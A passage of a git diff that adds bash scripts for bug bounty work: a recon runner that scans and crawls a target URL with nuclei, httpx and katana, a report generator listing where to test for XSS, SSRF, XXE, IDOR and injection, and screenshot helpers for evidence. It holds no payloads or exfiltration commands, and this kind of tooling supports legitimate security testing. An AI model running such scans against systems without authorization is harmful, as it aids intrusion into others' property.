tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Technology detection with httpx...${NC}' && echo '$url' | httpx -td -title -status-code -content-length -server -tech-detect -follow-redirects -o httpx.txt && echo -e '${GREEN}✓ httpx complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ httpx not installed - skipping tech detection${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 3 (bottom-left): katana (web crawler with all output formats)
|
||||
tmux select-pane -t 3
|
||||
if command -v katana &>/dev/null; then
|
||||
# Full katana with all output formats as originally requested
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting katana crawler (full output)...${NC}' && katana -u '$url' -jc -kf all -aff -d 10 -o katana.txt 2>&1 | tee katana.log && katana -u '$url' -jc -kf all -aff -d 10 -f path -o katana_paths.txt && katana -u '$url' -jc -kf all -aff -d 10 -f url -o katana_urls.txt && katana -u '$url' -jc -kf all -aff -d 10 -f udir -o katana_dirs.txt && cat katana_dirs.txt 2>/dev/null | sort -u >> urls.txt && cat katana_paths.txt 2>/dev/null | sed 's/^.//g' >> paths.txt && echo -e '${GREEN}✓ Katana complete (all formats)${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ katana not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 4 (bottom-right): Live results dashboard
|
||||
tmux select-pane -t 4
|
||||
# Watch output files and show live statistics
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${CYAN}╔══════════════════════════════════════════════╗${NC}' && echo -e '${CYAN}║ BUG BOUNTY RECON DASHBOARD (SAFE MODE) ║${NC}' && echo -e '${CYAN}╚══════════════════════════════════════════════╝${NC}' && echo -e '${YELLOW}[*] Monitoring output files...${NC}' && while true; do clear; echo -e '${CYAN}═══ Bug Bounty Safe Reconnaissance ═══${NC}'; echo; echo -e '${GREEN}Nuclei (info/low + takeover):${NC}'; [ -f nuclei.txt ] && [ -s nuclei.txt ] && echo \" Found: \$(wc -l < nuclei.txt 2>/dev/null || echo 0) findings\" || [ -f nuclei.log ] && grep -q 'complete' nuclei.log 2>/dev/null && echo ' Complete (0 findings)' || echo ' Waiting...'; echo; echo -e '${GREEN}Technology Stack (httpx):${NC}'; [ -f httpx.txt ] && [ -s httpx.txt ] && echo \" Detected: \$(grep -c 'http' httpx.txt 2>/dev/null || echo 0) technologies\" || echo ' Waiting...'; echo; echo -e '${GREEN}Katana Crawler:${NC}'; [ -f katana.txt ] && [ -s katana.txt ] && echo \" Crawled: \$(wc -l < katana.txt 2>/dev/null || echo 0) URLs\" || echo ' Waiting...'; echo; echo -e '${GREEN}JS Endpoints:${NC}'; [ -f katana_paths.txt ] && [ -s katana_paths.txt ] && echo \" Discovered: \$(wc -l < katana_paths.txt 2>/dev/null || echo 0) paths\" || echo ' None yet'; echo; echo -e '${CYAN}Latest Discoveries:${NC}'; [ -f katana_urls.txt ] && tail -5 katana_urls.txt 2>/dev/null || echo ' None yet'; echo; echo -e '${YELLOW}[Press Ctrl+C to stop monitoring]${NC}'; sleep 3; done" C-m
|
||||
|
||||
# Focus back on top-left pane (nuclei)
|
||||
tmux select-pane -t 1
|
||||
|
||||
echo
|
||||
echo -e "${GREEN}✓${NC} Tmux bug bounty recon window created"
|
||||
echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> BB: ${url:0:20}... <--${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
echo
|
||||
echo -e "${GREEN}Bug Bounty Safe:${NC}"
|
||||
echo -e " ✓ No directory brute-forcing"
|
||||
echo -e " ✓ No parameter fuzzing"
|
||||
echo -e " ✓ Info/Low severity only"
|
||||
echo -e " ✓ Passive endpoint discovery"
|
||||
}
|
||||
|
||||
# Sequential execution (when not in tmux)
|
||||
run_scans_sequential() {
|
||||
local url="$1"
|
||||
|
||||
cd "$OUTPUT_DIR"
|
||||
|
||||
echo -e "\n${GREENSTAR} Running nuclei (info/low + subdomain takeover)...${NC}"
|
||||
command -v nuclei &>/dev/null && nuclei -u "$url" -s info,low -t exposed-panels/ -t exposures/ -t misconfiguration/ -t technologies/ -t takeovers/ -t subdomain-takeover/ -o nuclei.txt || echo "nuclei not installed"
|
||||
|
||||
echo -e "\n${GREENSTAR} Technology detection with httpx...${NC}"
|
||||
command -v httpx &>/dev/null && echo "$url" | httpx -td -title -status-code -content-length -server -tech-detect -follow-redirects -o httpx.txt || echo "httpx not installed"
|
||||
|
||||
echo -e "\n${GREENSTAR} Running katana (JS-aware crawler)...${NC}"
|
||||
if command -v katana &>/dev/null; then
|
||||
katana -u "$url" -jc -kf all -aff -d 10 -o katana.txt
|
||||
katana -u "$url" -jc -kf all -aff -d 10 -f path -o katana_paths.txt
|
||||
katana -u "$url" -jc -kf all -aff -d 10 -f url -o katana_urls.txt
|
||||
fi
|
||||
|
||||
cd ..
|
||||
|
||||
echo -e "\n${GREEN}✓${NC} Bug bounty recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Parse arguments
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
url="$1"
|
||||
|
||||
# Validate URL
|
||||
if [[ -z "$url" ]]; then
|
||||
echo -e "${RED}Error:${NC} URL required"
|
||||
echo "Usage: bb-recon <url>"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Check tools
|
||||
check_tools
|
||||
|
||||
# Run bug bounty reconnaissance
|
||||
run_bb_recon "$url"
|
||||
353
scripts/pentesting/bb-report-generator
Executable file
353
scripts/pentesting/bb-report-generator
Executable file
|
|
@ -0,0 +1,353 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: bb-report-generator
|
||||
# Description: Generate bug bounty recon report from bb-recon output
|
||||
# Based on Jason Haddix's "Find Features First, Bugs Second" philosophy
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}bb-report-generator${NC} - Bug Bounty Recon Report Generator v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " bb-report-generator <recon-directory>"
|
||||
echo
|
||||
echo -e "${BOLD}DESCRIPTION:${NC}"
|
||||
echo " Analyzes bb-recon output and generates prioritized manual testing guide"
|
||||
echo " Based on Jason Haddix's Bug Hunter Methodology"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " bb-report-generator ./bb-recon-target.com-20240101-120000"
|
||||
echo " bb-report-generator ./bb-recon-*"
|
||||
echo
|
||||
echo -e "${BOLD}OUTPUT:${NC}"
|
||||
echo " Creates manual-testing-guide.md in the recon directory"
|
||||
}
|
||||
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
RECON_DIR="$1"
|
||||
|
||||
if [[ ! -d "$RECON_DIR" ]]; then
|
||||
echo -e "${RED}Error:${NC} Directory not found: $RECON_DIR"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo -e "${CYAN}${BOLD}"
|
||||
echo "╔════════════════════════════════════════════════════════════╗"
|
||||
echo "║ Bug Bounty Recon Report Generator ║"
|
||||
echo "║ Jason Haddix Methodology: Features → Bugs ║"
|
||||
echo "╚════════════════════════════════════════════════════════════╝"
|
||||
echo -e "${NC}"
|
||||
|
||||
REPORT_FILE="$RECON_DIR/manual-testing-guide.md"
|
||||
|
||||
# Start report
|
||||
cat > "$REPORT_FILE" << 'EOF'
|
||||
# Bug Bounty Manual Testing Guide
|
||||
|
||||
**Generated:** $(date)
|
||||
**Philosophy:** Find FEATURES first, then BUGS second (Jason Haddix)
|
||||
|
||||
---
|
||||
|
||||
## 🎯 High Priority Testing Areas
|
||||
|
||||
Based on Jason Haddix's "Heat Map" - where bugs normally hide:
|
||||
|
||||
### 1. Upload Functions 🔥 (HIGHEST PRIORITY)
|
||||
**Why:** Always vulnerable! XSS, XXE, SSRF, Shell upload
|
||||
|
||||
**Actions:**
|
||||
- [ ] Find all file upload endpoints
|
||||
- [ ] Test XML-based uploads (Docs/PDFs) for XXE and SSRF
|
||||
- [ ] Test image uploads for XSS in filename/EXIF/binary header
|
||||
- [ ] Check where uploaded files are stored (S3 misconfigurations?)
|
||||
- [ ] Try polyglot files (valid image + shell code)
|
||||
|
||||
### 2. APIs 🔥
|
||||
**Why:** Hidden HTTP methods, lack of auth, mass assignment, excessive data exposure
|
||||
|
||||
**Actions:**
|
||||
- [ ] Test PUT, DELETE, PATCH methods (not just GET/POST)
|
||||
- [ ] Check for missing authentication
|
||||
- [ ] Test for mass assignment vulnerabilities
|
||||
- [ ] Look for excessive data exposure in responses
|
||||
- [ ] Analyze API versioning (v1, v2, etc.) for inconsistencies
|
||||
|
||||
### 3. Account Section (Profile/Settings) 🔥
|
||||
**Why:** Stored XSS, SSTI, SSRF
|
||||
|
||||
**Actions:**
|
||||
- [ ] Test ALL custom fields for Stored XSS
|
||||
- [ ] Check bio, name, location, custom fields
|
||||
- [ ] Test webhook URLs and callback URLs for SSRF
|
||||
- [ ] Look for integrations that import external content
|
||||
|
||||
### 4. Content Types 🔥
|
||||
**Why:** Multipart-forms "always have a vulnerability"
|
||||
|
||||
**Actions:**
|
||||
- [ ] Test `multipart/form-data` for shell uploads, injections, bypasses
|
||||
- [ ] Test `Content-Type: application/xml` for XXE
|
||||
- [ ] Test `Content-Type: application/json` for API vulnerabilities
|
||||
|
||||
### 5. Error Messages
|
||||
**Why:** Information disclosure, exotic injection vectors
|
||||
|
||||
**Actions:**
|
||||
- [ ] Trigger errors intentionally
|
||||
- [ ] Check stack traces for paths, versions, database types
|
||||
- [ ] Test for Application DoS via resource exhaustion
|
||||
|
||||
### 6. URLs/Paths as Values
|
||||
**Why:** SSRF, Open Redirects
|
||||
|
||||
**Actions:**
|
||||
- [ ] Find parameters like: `?url=`, `?redirect=`, `?next=`, `?callback=`
|
||||
- [ ] Test for SSRF vulnerabilities
|
||||
- [ ] Test for open redirects
|
||||
|
||||
---
|
||||
|
||||
## 📊 Recon Summary
|
||||
|
||||
EOF
|
||||
|
||||
# Add Technology Stack section
|
||||
echo "### Technology Stack Identified" >> "$REPORT_FILE"
|
||||
echo >> "$REPORT_FILE"
|
||||
if [[ -f "$RECON_DIR/httpx.txt" ]]; then
|
||||
echo "**Technologies detected (httpx):**" >> "$REPORT_FILE"
|
||||
echo '```' >> "$REPORT_FILE"
|
||||
cat "$RECON_DIR/httpx.txt" | head -20 >> "$REPORT_FILE"
|
||||
echo '```' >> "$REPORT_FILE"
|
||||
elif [[ -f "$RECON_DIR/whatweb.txt" ]]; then
|
||||
echo "**Technologies detected (whatweb):**" >> "$REPORT_FILE"
|
||||
grep -oE '\[[^\]]+\]' "$RECON_DIR/whatweb.txt" | sort -u | head -20 >> "$REPORT_FILE" || echo "None found" >> "$REPORT_FILE"
|
||||
else
|
||||
echo "*No technology fingerprinting data available*" >> "$REPORT_FILE"
|
||||
fi
|
||||
echo >> "$REPORT_FILE"
|
||||
|
||||
# Add Nuclei Findings section
|
||||
echo "### Nuclei Findings (Info/Low Severity)" >> "$REPORT_FILE"
|
||||
echo >> "$REPORT_FILE"
|
||||
if [[ -f "$RECON_DIR/nuclei.txt" ]] && [[ -s "$RECON_DIR/nuclei.txt" ]]; then
|
||||
NUCLEI_COUNT=$(wc -l < "$RECON_DIR/nuclei.txt")
|
||||
echo "**Total findings:** $NUCLEI_COUNT" >> "$REPORT_FILE"
|
||||
echo >> "$REPORT_FILE"
|
||||
echo '```' >> "$REPORT_FILE"
|
||||
head -20 "$RECON_DIR/nuclei.txt" >> "$REPORT_FILE"
|
||||
echo '```' >> "$REPORT_FILE"
|
||||
else
|
||||
echo "*No Nuclei findings*" >> "$REPORT_FILE"
|
||||
fi
|
||||
echo >> "$REPORT_FILE"
|
||||
|
||||
# Add Subdomain Takeover section
|
||||
echo "### Subdomain Takeover Check" >> "$REPORT_FILE"
|
||||
echo >> "$REPORT_FILE"
|
||||
if [[ -f "$RECON_DIR/takeover.txt" ]] && [[ -s "$RECON_DIR/takeover.txt" ]]; then
|
||||
echo "**⚠️ POTENTIAL TAKEOVER VULNERABILITIES FOUND!**" >> "$REPORT_FILE"
|
||||
echo >> "$REPORT_FILE"
|
||||
echo '```' >> "$REPORT_FILE"
|
||||
cat "$RECON_DIR/takeover.txt" >> "$REPORT_FILE"
|
||||
echo '```' >> "$REPORT_FILE"
|
||||
else
|
||||
echo "✅ No subdomain takeover vulnerabilities detected" >> "$REPORT_FILE"
|
||||
fi
|
||||
echo >> "$REPORT_FILE"
|
||||
|
||||
# Add Endpoints Discovered section
|
||||
echo "### Endpoints Discovered (Katana Crawler)" >> "$REPORT_FILE"
|
||||
echo >> "$REPORT_FILE"
|
||||
if [[ -f "$RECON_DIR/katana_urls.txt" ]] && [[ -s "$RECON_DIR/katana_urls.txt" ]]; then
|
||||
URL_COUNT=$(wc -l < "$RECON_DIR/katana_urls.txt")
|
||||
echo "**Total URLs crawled:** $URL_COUNT" >> "$REPORT_FILE"
|
||||
echo >> "$REPORT_FILE"
|
||||
echo "**Sample URLs (first 20):**" >> "$REPORT_FILE"
|
||||
echo '```' >> "$REPORT_FILE"
|
||||
head -20 "$RECON_DIR/katana_urls.txt" >> "$REPORT_FILE"
|
||||
echo '```' >> "$REPORT_FILE"
|
||||
else
|
||||
echo "*No URLs discovered*" >> "$REPORT_FILE"
|
||||
fi
|
||||
echo >> "$REPORT_FILE"
|
||||
|
||||
# Add JavaScript Endpoints section
|
||||
echo "### JavaScript Endpoints & Paths" >> "$REPORT_FILE"
|
||||
echo >> "$REPORT_FILE"
|
||||
if [[ -f "$RECON_DIR/katana_paths.txt" ]] && [[ -s "$RECON_DIR/katana_paths.txt" ]]; then
|
||||
PATH_COUNT=$(wc -l < "$RECON_DIR/katana_paths.txt")
|
||||
echo "**Total paths discovered:** $PATH_COUNT" >> "$REPORT_FILE"
|
||||
echo >> "$REPORT_FILE"
|
||||
echo "**Interesting paths (first 20):**" >> "$REPORT_FILE"
|
||||
echo '```' >> "$REPORT_FILE"
|
||||
head -20 "$RECON_DIR/katana_paths.txt" >> "$REPORT_FILE"
|
||||
echo '```' >> "$REPORT_FILE"
|
||||
else
|
||||
echo "*No JavaScript paths discovered*" >> "$REPORT_FILE"
|
||||
fi
|
||||
echo >> "$REPORT_FILE"
|
||||
|
||||
# Add "The Big 6 Questions" section
|
||||
cat >> "$REPORT_FILE" << 'EOF'
|
||||
|
||||
---
|
||||
|
||||
## 🔍 The Big 6 Questions (Jason Haddix)
|
||||
|
||||
Answer these before testing:
|
||||
|
||||
### 1. How does the app pass data?
|
||||
**Map ALL input methods:**
|
||||
- [ ] GET parameters
|
||||
- [ ] POST parameters
|
||||
- [ ] JSON body data
|
||||
- [ ] XML body data
|
||||
- [ ] Cookies
|
||||
- [ ] Custom headers (X-*)
|
||||
- [ ] WebSocket messages
|
||||
- [ ] GraphQL queries
|
||||
|
||||
### 2. How/Where does the app talk about users?
|
||||
**Find user identifiers for IDOR/Authorization testing:**
|
||||
- [ ] User IDs in URLs
|
||||
- [ ] UUIDs
|
||||
- [ ] Email addresses
|
||||
- [ ] Usernames
|
||||
- [ ] Session tokens
|
||||
- [ ] JWT tokens (decode and analyze!)
|
||||
|
||||
**Tip:** IDOR → XSS chain for higher severity!
|
||||
|
||||
### 3. Does the site have multi-tenancy or user levels?
|
||||
**Test for authorization bugs:**
|
||||
- [ ] Regular user vs Admin
|
||||
- [ ] Free tier vs Premium tier
|
||||
- [ ] Organization A vs Organization B
|
||||
- [ ] Test horizontal access (User A → User B data)
|
||||
- [ ] Test vertical access (User → Admin escalation)
|
||||
|
||||
**Use Burp's Autorize extension!**
|
||||
|
||||
### 4. Does the site have a unique threat model?
|
||||
**Beyond PII, look for:**
|
||||
- [ ] API keys and secrets (developer portals)
|
||||
- [ ] Doxing opportunities (social platforms)
|
||||
- [ ] Financial data (payment platforms)
|
||||
- [ ] Healthcare data (HIPAA)
|
||||
|
||||
### 5. Has there been past security research?
|
||||
**Search for previous vulnerabilities:**
|
||||
- [ ] HackerOne disclosed reports
|
||||
- [ ] Bugcrowd disclosures
|
||||
- [ ] CVE databases
|
||||
- [ ] Security researcher blogs
|
||||
- [ ] Conference presentations
|
||||
|
||||
**Google:** `site:hackerone.com "target.com" disclosed`
|
||||
|
||||
### 6. How does the app handle XSS? CSRF? Injection?
|
||||
**Understand defenses:**
|
||||
- [ ] WAF presence (Cloudflare, Akamai, ModSecurity)
|
||||
- [ ] XSS filters (CSP, Chrome Auditor)
|
||||
- [ ] CSRF tokens (present? validated? reusable?)
|
||||
- [ ] Input sanitization
|
||||
- [ ] Output encoding
|
||||
|
||||
**Adaptive Strategy:** Don't waste time on hardened areas - find soft spots!
|
||||
|
||||
---
|
||||
|
||||
## 📋 Manual Testing Checklist
|
||||
|
||||
Based on findings, prioritize testing:
|
||||
|
||||
### Phase 1: Quick Wins
|
||||
- [ ] Test all file upload endpoints (if any)
|
||||
- [ ] Check for subdomain takeovers (already scanned)
|
||||
- [ ] Test exposed admin panels (from Nuclei)
|
||||
- [ ] Check for default credentials
|
||||
- [ ] Test open redirects in `?url=` parameters
|
||||
|
||||
### Phase 2: Authorization Testing
|
||||
- [ ] Create 2+ accounts at different privilege levels
|
||||
- [ ] Test IDOR on all endpoints with user identifiers
|
||||
- [ ] Test horizontal access (User A → User B)
|
||||
- [ ] Test vertical access (User → Admin)
|
||||
- [ ] Use Burp Autorize for automated testing
|
||||
|
||||
### Phase 3: Input Validation
|
||||
- [ ] Test XSS in all input fields
|
||||
- [ ] Test SQL injection in parameters
|
||||
- [ ] Test SSRF in URL/webhook parameters
|
||||
- [ ] Test XXE in XML endpoints
|
||||
- [ ] Test SSTI in template fields
|
||||
|
||||
### Phase 4: Business Logic
|
||||
- [ ] Test race conditions (payments, redemptions)
|
||||
- [ ] Test negative quantities
|
||||
- [ ] Test price manipulation
|
||||
- [ ] Test insecure password reset flows
|
||||
|
||||
### Phase 5: Deep Dive
|
||||
- [ ] JavaScript analysis for hidden endpoints
|
||||
- [ ] API testing (hidden methods, versions)
|
||||
- [ ] Session management testing
|
||||
- [ ] CSRF testing
|
||||
|
||||
---
|
||||
|
||||
## 🛠️ Recommended Tools for Manual Testing
|
||||
|
||||
**Burp Suite Extensions:**
|
||||
- LinkFinder - Parse JS for endpoints
|
||||
- Hunt Scanner RMX - Highlight interesting parameters
|
||||
- Autorize - Automated authorization testing
|
||||
- Burp Bounty - Custom scan checks + Blind XSS
|
||||
|
||||
**Command-line:**
|
||||
- `sqlmap` - SQL injection testing
|
||||
- `ffuf` - Directory/parameter fuzzing (if needed)
|
||||
- `dalfox` - XSS scanner
|
||||
- `nuclei` - CVE and exploit template scanning
|
||||
|
||||
**Remember:** Run aggressive tools ONLY if within bug bounty program rules!
|
||||
|
||||
---
|
||||
|
||||
## 📚 Resources
|
||||
|
||||
- [Jason Haddix - The Bug Hunter's Methodology](https://www.youtube.com/watch?v=uKWu6yhnhbQ)
|
||||
- [PortSwigger Web Security Academy](https://portswigger.net/web-security)
|
||||
- [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)
|
||||
- [HackerOne Disclosed Reports](https://hackerone.com/hacktivity)
|
||||
|
||||
---
|
||||
|
||||
**Generated by bb-report-generator v1.0.0**
|
||||
EOF
|
||||
|
||||
echo -e "${GREEN}✓ Report generated:${NC} $REPORT_FILE"
|
||||
echo
|
||||
echo -e "${CYAN}Next steps:${NC}"
|
||||
echo " 1. Read the manual testing guide"
|
||||
echo " 2. Answer 'The Big 6 Questions'"
|
||||
echo " 3. Follow the prioritized testing checklist"
|
||||
echo " 4. Find FEATURES first, then BUGS second!"
|
||||
67
scripts/pentesting/bb-screenshot
Executable file
67
scripts/pentesting/bb-screenshot
Executable file
|
|
@ -0,0 +1,67 @@
|
|||
#!/usr/bin/env bash
|
||||
# Bug Bounty Screenshot Helper with Automatic Borders and Annotations
|
||||
# Usage: bb-screenshot.sh [program-name]
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
PROGRAM="${1:-current}"
|
||||
SCREENSHOT_DIR="${HOME}/bug-bounty/${PROGRAM}/screenshots"
|
||||
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
|
||||
TEMP_FILE="/tmp/flameshot_${TIMESTAMP}.png"
|
||||
FINAL_FILE="${SCREENSHOT_DIR}/${TIMESTAMP}_screenshot.png"
|
||||
|
||||
# Colors
|
||||
GREEN='\033[0;32m'
|
||||
BLUE='\033[0;34m'
|
||||
YELLOW='\033[1;33m'
|
||||
NC='\033[0m'
|
||||
|
||||
# Ensure screenshot directory exists
|
||||
mkdir -p "$SCREENSHOT_DIR"
|
||||
|
||||
echo -e "${BLUE}[+] Bug Bounty Screenshot Tool${NC}"
|
||||
echo -e "${YELLOW}[!] Take your screenshot, annotate as needed, then click Save${NC}"
|
||||
echo ""
|
||||
|
||||
# Take screenshot with Flameshot (with annotation tools)
|
||||
flameshot gui -p "$TEMP_FILE"
|
||||
|
||||
# Check if screenshot was actually taken (user might have cancelled)
|
||||
if [[ ! -f "$TEMP_FILE" ]]; then
|
||||
echo -e "${YELLOW}[!] Screenshot cancelled${NC}"
|
||||
exit 0
|
||||
fi
|
||||
|
||||
echo -e "${GREEN}[✓] Screenshot captured${NC}"
|
||||
echo -e "${BLUE}[+] Adding professional border...${NC}"
|
||||
|
||||
# Add border and shadow using ImageMagick
|
||||
convert "$TEMP_FILE" \
|
||||
-bordercolor '#333333' -border 2 \
|
||||
-bordercolor white -border 10 \
|
||||
-bordercolor '#333333' -border 2 \
|
||||
\( +clone -background black -shadow 80x5+5+5 \) \
|
||||
+swap -background white -layers merge +repage \
|
||||
"$FINAL_FILE"
|
||||
|
||||
# Remove temp file
|
||||
rm "$TEMP_FILE"
|
||||
|
||||
echo -e "${GREEN}[✓] Screenshot saved with border: $FINAL_FILE${NC}"
|
||||
echo -e "${BLUE}[+] Copying path to clipboard...${NC}"
|
||||
|
||||
# Copy filename to clipboard (for easy paste into JSON)
|
||||
echo "screenshots/$(basename "$FINAL_FILE")" | xclip -selection clipboard 2>/dev/null || \
|
||||
echo "screenshots/$(basename "$FINAL_FILE")" | wl-copy 2>/dev/null || \
|
||||
echo -e "${YELLOW}[!] Could not copy to clipboard (install xclip or wl-clipboard)${NC}"
|
||||
|
||||
echo ""
|
||||
echo -e "${GREEN}Path copied: screenshots/$(basename "$FINAL_FILE")${NC}"
|
||||
echo -e "${YELLOW}[!] Paste this into your vulnerability JSON file${NC}"
|
||||
|
||||
# Optional: Open the screenshot to verify
|
||||
if command -v feh &> /dev/null; then
|
||||
feh "$FINAL_FILE" &
|
||||
elif command -v eog &> /dev/null; then
|
||||
eog "$FINAL_FILE" &
|
||||
fi
|
||||
178
scripts/pentesting/bb-screenshot-annotate
Executable file
178
scripts/pentesting/bb-screenshot-annotate
Executable file
|
|
@ -0,0 +1,178 @@
|
|||
#!/usr/bin/env bash
|
||||
# Advanced Bug Bounty Screenshot with Pre-made Annotation Templates
|
||||
# Usage: bb-screenshot-annotate.sh <program> <type>
|
||||
# Types: vulnerability, proof, request, response, comparison
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
PROGRAM="${1:-current}"
|
||||
TYPE="${2:-vulnerability}"
|
||||
SCREENSHOT_DIR="${HOME}/bug-bounty/${PROGRAM}/screenshots"
|
||||
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
|
||||
TEMP_FILE="/tmp/flameshot_${TIMESTAMP}.png"
|
||||
FINAL_FILE="${SCREENSHOT_DIR}/${TIMESTAMP}_${TYPE}.png"
|
||||
|
||||
# Colors
|
||||
RED='\033[0;31m'
|
||||
GREEN='\033[0;32m'
|
||||
BLUE='\033[0;34m'
|
||||
YELLOW='\033[1;33m'
|
||||
NC='\033[0m'
|
||||
|
||||
# Ensure screenshot directory exists
|
||||
mkdir -p "$SCREENSHOT_DIR"
|
||||
|
||||
show_usage() {
|
||||
cat << EOF
|
||||
Bug Bounty Screenshot Annotation Tool
|
||||
|
||||
Usage: bb-screenshot-annotate.sh <program> <type>
|
||||
|
||||
Screenshot Types:
|
||||
vulnerability - Highlighting the vulnerability (red arrows/boxes)
|
||||
proof - Proof of exploitation (green success indicators)
|
||||
request - HTTP request in Burp Suite
|
||||
response - HTTP response showing vulnerability
|
||||
comparison - Before/After comparison
|
||||
evidence - General evidence screenshot
|
||||
|
||||
Examples:
|
||||
bb-screenshot-annotate.sh juice-shop vulnerability
|
||||
bb-screenshot-annotate.sh acme proof
|
||||
bb-screenshot-annotate.sh target request
|
||||
|
||||
Tips:
|
||||
- Use Flameshot's built-in tools for annotation:
|
||||
* Arrow (for pointing)
|
||||
* Rectangle (for highlighting)
|
||||
* Text (for labels)
|
||||
* Pixelate (for redacting sensitive data)
|
||||
- Red for vulnerabilities
|
||||
- Green for successful exploitation
|
||||
- Yellow for important notes
|
||||
|
||||
EOF
|
||||
}
|
||||
|
||||
if [[ "${1:-}" == "-h" ]] || [[ "${1:-}" == "--help" ]]; then
|
||||
show_usage
|
||||
exit 0
|
||||
fi
|
||||
|
||||
# Display tips based on screenshot type
|
||||
case "$TYPE" in
|
||||
vulnerability)
|
||||
echo -e "${RED}[!] VULNERABILITY SCREENSHOT${NC}"
|
||||
echo -e "${YELLOW}Tips:${NC}"
|
||||
echo " - Use RED arrows to point at the vulnerability"
|
||||
echo " - Use RED rectangles to highlight affected areas"
|
||||
echo " - Add text labels explaining what's wrong"
|
||||
;;
|
||||
proof)
|
||||
echo -e "${GREEN}[!] PROOF OF EXPLOITATION${NC}"
|
||||
echo -e "${YELLOW}Tips:${NC}"
|
||||
echo " - Show successful exploitation result"
|
||||
echo " - Highlight important output (session cookies, data, etc.)"
|
||||
echo " - Use GREEN to show success"
|
||||
;;
|
||||
request)
|
||||
echo -e "${BLUE}[!] HTTP REQUEST SCREENSHOT${NC}"
|
||||
echo -e "${YELLOW}Tips:${NC}"
|
||||
echo " - Capture Burp Suite request"
|
||||
echo " - Highlight malicious payload in RED"
|
||||
echo " - Show request method and endpoint clearly"
|
||||
;;
|
||||
response)
|
||||
echo -e "${BLUE}[!] HTTP RESPONSE SCREENSHOT${NC}"
|
||||
echo -e "${YELLOW}Tips:${NC}"
|
||||
echo " - Capture server response"
|
||||
echo " - Highlight vulnerability indicators (errors, data leaks)"
|
||||
echo " - Show status code and response headers"
|
||||
;;
|
||||
comparison)
|
||||
echo -e "${YELLOW}[!] BEFORE/AFTER COMPARISON${NC}"
|
||||
echo -e "${YELLOW}Tips:${NC}"
|
||||
echo " - Show side-by-side comparison"
|
||||
echo " - Label 'BEFORE' and 'AFTER' clearly"
|
||||
echo " - Highlight the difference"
|
||||
;;
|
||||
evidence)
|
||||
echo -e "${BLUE}[!] GENERAL EVIDENCE${NC}"
|
||||
echo -e "${YELLOW}Tips:${NC}"
|
||||
echo " - Capture relevant evidence"
|
||||
echo " - Annotate important details"
|
||||
echo " - Keep it clear and professional"
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}[-] Unknown type: $TYPE${NC}"
|
||||
echo "Valid types: vulnerability, proof, request, response, comparison, evidence"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
|
||||
echo ""
|
||||
echo -e "${BLUE}[+] Opening Flameshot...${NC}"
|
||||
echo -e "${YELLOW}[!] Annotate your screenshot, then click Save${NC}"
|
||||
echo ""
|
||||
|
||||
# Take screenshot with Flameshot (with annotation tools)
|
||||
flameshot gui -p "$TEMP_FILE"
|
||||
|
||||
# Check if screenshot was actually taken
|
||||
if [[ ! -f "$TEMP_FILE" ]]; then
|
||||
echo -e "${YELLOW}[!] Screenshot cancelled${NC}"
|
||||
exit 0
|
||||
fi
|
||||
|
||||
echo -e "${GREEN}[✓] Screenshot captured${NC}"
|
||||
echo -e "${BLUE}[+] Adding professional border and shadow...${NC}"
|
||||
|
||||
# Add border based on type
|
||||
case "$TYPE" in
|
||||
vulnerability)
|
||||
BORDER_COLOR='#DC143C' # Crimson red
|
||||
;;
|
||||
proof)
|
||||
BORDER_COLOR='#228B22' # Forest green
|
||||
;;
|
||||
request|response)
|
||||
BORDER_COLOR='#4169E1' # Royal blue
|
||||
;;
|
||||
comparison)
|
||||
BORDER_COLOR='#FF8C00' # Dark orange
|
||||
;;
|
||||
evidence)
|
||||
BORDER_COLOR='#696969' # Dim gray
|
||||
;;
|
||||
esac
|
||||
|
||||
# Add colored border, white mat, outer border, and drop shadow
|
||||
convert "$TEMP_FILE" \
|
||||
-bordercolor "$BORDER_COLOR" -border 3 \
|
||||
-bordercolor white -border 12 \
|
||||
-bordercolor '#333333' -border 1 \
|
||||
\( +clone -background black -shadow 80x5+8+8 \) \
|
||||
+swap -background white -layers merge +repage \
|
||||
"$FINAL_FILE"
|
||||
|
||||
# Remove temp file
|
||||
rm "$TEMP_FILE"
|
||||
|
||||
